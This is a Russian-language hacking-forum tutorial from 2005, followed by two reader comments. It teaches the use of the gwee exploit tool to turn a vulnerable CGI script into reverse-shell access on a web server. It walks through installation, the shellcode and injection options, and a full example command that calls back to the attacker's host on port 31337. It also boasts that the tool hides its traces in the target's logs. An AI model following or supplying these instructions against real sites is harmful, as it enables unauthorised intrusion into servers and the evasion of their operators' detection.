/=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\ ..::!! Все о Gwee !!::.. \==: INTRO :===================================================================/ Gwee - это эксплоит который служит для получения шелл доступа к уязвимому сайту. Допустим вы нашли бажный CGI скрипт, пользуетесь веб-шеллом, и все бы ничего. Тока вот этого мало для вас, что тогда делать? Ответ простой, вы качаете gwee, устанавливаете и получаете не веб-шелл, а вполне хороший шелл доступ, конечно же права ваши будут не root (при первом посещении =), но все таки это уже консоль и работать там куда приятнее. Наверно самым сложным в обращении с gwee, является умение задать правильные команды. Именно от того какие параметры вы установите и будет зависеть успех вашей операции =)(подробнее о параметрах читай ниже). Чем еще замечателен gwee, так это тем, что он является универсальным. Универсальность в том, что он может получить шелл на многих машинах под разными ОС. Дело в том, что при использовании его вы определяете какой шелл-код будет пересылаться на уязвимую машину. В gwee доступны следующие типы шелл-кодов: +-------------------------+ | Sabu's Perl shellcode | | Linux x86 binary | | FreeBSD x86 binary | | NetBSD x86 binary | | Sabu's Python shellcode.| +-------------------------+ Видим, что набор хорош. Благодаря этому набору, возможно получить шелл практически на любом серваке (главное найти уязвимый скрипт =). Еще хотелось бы отметить, что пересылка шеллкода происходит методом GET и POST. По умолчанию пересылка ведется методом POST, но почему-то не всегда работает. Поэтому я советую определять опцию пересылки =). Теперь поговорим о защите самого себя при использовании gwee. В логах сплоит следит очень хорошо, НО он делает это «красиво», т.е. он оставляет следы в зашифрованном виде и понять, что происходило на машине не возможно. Так что он безопасный, использование его не должно привести к каким то плохим последствиям Установить gwee не просто, а очень просто. Вот последовательность команд: +-----------------------------------+ | wget (или любая другая качалка) | | cd | | make unix (команда установки gwee)| +-----------------------------------+ и все! Больше ненужно ничего лишнего. Я же говорил, что очень просто. ==: Parametrs:================================================================== Теперь поговорим о параметрах применяемые в gwee. Я не буду рассказывать обо всех параметрах, расскажу только о самых нужных на первый раз. Поехали! -h Это наверно стандартный параметр в любой программе =)). Короче это помощь =) -y Начальный параметр, указывается перед частью ссылки до эксплуатации gwee -y'?cmd=' -z Часть ссылки на уязвимый скрипт и его параметры после выполнения команд gwee -y'?cmd=' -z'|' target/cgi-bin/test.cgi -G Этот параметр определяет способ пересылки шелкода, о котором мы говорили выше. Как и выше я говорю, что лучше указать этот параметр. Т.е. если вы его укажите, то персылка ведется методом GET иначе POST. -l Этот параметр нужен для того что бы соединится к вашему хосту. Указывается либо название вашего хоста с которого происходит соединение, либо ip адрес вашего хоста. gwee -y'?cmd=' -z'|' -l test.com target/cgi-bin/test.cgi -p Определяет порт содинения, по умолчанию стоит 31337 -s 0 = Sabu's Perl shellcode (default if -s is omitted) 1 = Linux x86 binary 2 = FreeBSD x86 binary 3 = NetBSD x86 binary 4 = Sabu's Python shellcode (the target must have Python installed) Этот параметр определяет какой тип шелл-кода будет пересылаться -i 0 = perl -e "print \"<hex>\"" (default if -i is omitted) 1 = python -c "__import__(\"sys\").stdout.write(\"<hex>\")" 2 = printf "<hex>" 3 = echo -ne "<hex>" (works only if target's /bin/sh is bash) Каким методом будет получен шелл доступ ==: Examples :================================================================== Думаю на первый раз параметров хватит. Ну а теперь немного о примерах, что бы было более понятно, что такое gwee. +--------------------------------------------------------------------------------+ | ./gwee -y'?file=|' -z'|'-l test.com -p 31337 -s1 -i3 -G http://example/vuln.pl | +--------------------------------------------------------------------------------+ Видим, что я определяю опцию G что бы пересылка шелл-кода шла методом GET. А так же все стандартные опции, которое описывал выше. Этот пример давольно простой, но он наглядно показывает как нужно правельно определять опции. ================================================================================ Я описал только азы работы с gwee, но этого достаточно для успешной эксплуатации Больше опций вы можете посмотреть в самой программе. Если будут какие вопросы по поводу этой статьи или по поводу самого gwee, то пишите ([email protected]) или стучите в аську ( 944408 ). Постораюсь помочь. Скачать gwee можно с нашего сайта: http://svt.nukleon.us/toos/gwee-1.36.tar.gz И официального сайта сплоита gwee: http://tigerteam.se/dl/gwee/ ================================================================================ Search Vulnerabilities Team - www.svt.nukleon.us - 27.06.05 автор CENSORED =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Средняя статья =) Не, это я серьёзно. Просто зачем нужен qwee, если можно через back-connect получить нормальный шелл.
кот777 ты не понял=) гвии это эксплойт с помощью которого ты получаешь консоль))откуда ты взял что в системе уже есть веб-шелл? ПЫ.СЫ. люди есть же видео... ПЫЫ.СЫЫ. мне статья чтото не понравилась..